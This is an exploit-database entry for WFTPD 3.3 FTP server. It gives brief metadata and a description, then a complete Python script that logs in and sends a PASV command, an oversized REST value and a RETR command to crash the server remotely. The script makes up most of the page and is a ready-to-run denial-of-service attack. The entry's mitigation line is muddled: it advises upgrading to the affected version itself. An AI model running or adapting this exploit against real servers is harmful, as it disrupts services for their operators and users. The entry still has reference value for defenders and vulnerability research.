WFTPD 3.3 unhandled exception

vendor:

WFTPD

by:

x_dmnt

7,5

CVSS

HIGH

DoS

400

CWE

Product Name: WFTPD

Affected Version From: 3.3

Affected Version To: 3.3

Patch Exists: Yes

Related CWE: N/A

CPE: a:wftp_software:wftpd

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

WFTPD 3.3 unhandled exception

This exploit is used to cause a denial of service (DoS) on a WFTPD 3.3 server. It works by sending a malicious 'rest' command with a very large number, followed by a 'retr' command with an existing file. This causes the server to crash.

Mitigation:

Upgrade to the latest version of WFTPD 3.3

Source

Exploit-DB raw data:

# WFTPD 3.3 unhandled exception
#
# (x)dmnt 2010
# -*- coding: windows-1252 -*-

import socket
import sys, time


def help_info():
    print ("Usage: wftpdkill <host> <login> <password> <existingfle>\n")

def dos_it(hostname, username, passwd, exfile):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(2048)
    print "[+] Connected"
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    time.sleep(3)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "Send evil commands"
    time.sleep(3)
    sock.send("pasv\r\n")
    r=sock.recv(1024)
    time.sleep(3)
    sock.send("rest 999999999999999999999999999999999999999999999999999999999999999999\r\n")
    r=sock.recv(1024)
    time.sleep(3)
    sock.send("retr %s\r\n" %exfile)
    time.sleep(3)
    sock.send("Burn, muthfcka, burn!\r\n")
    sock.close()
    print "Server killed\r\n"

print ("\nWFTPD 3.3 remote DoS exploit")

if len(sys.argv) < 5:
    help_info()
    sys.exit(1)

else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    exfile=sys.argv[4]
    dos_it(hostname,username,passwd,exfile)
    sys.exit(0)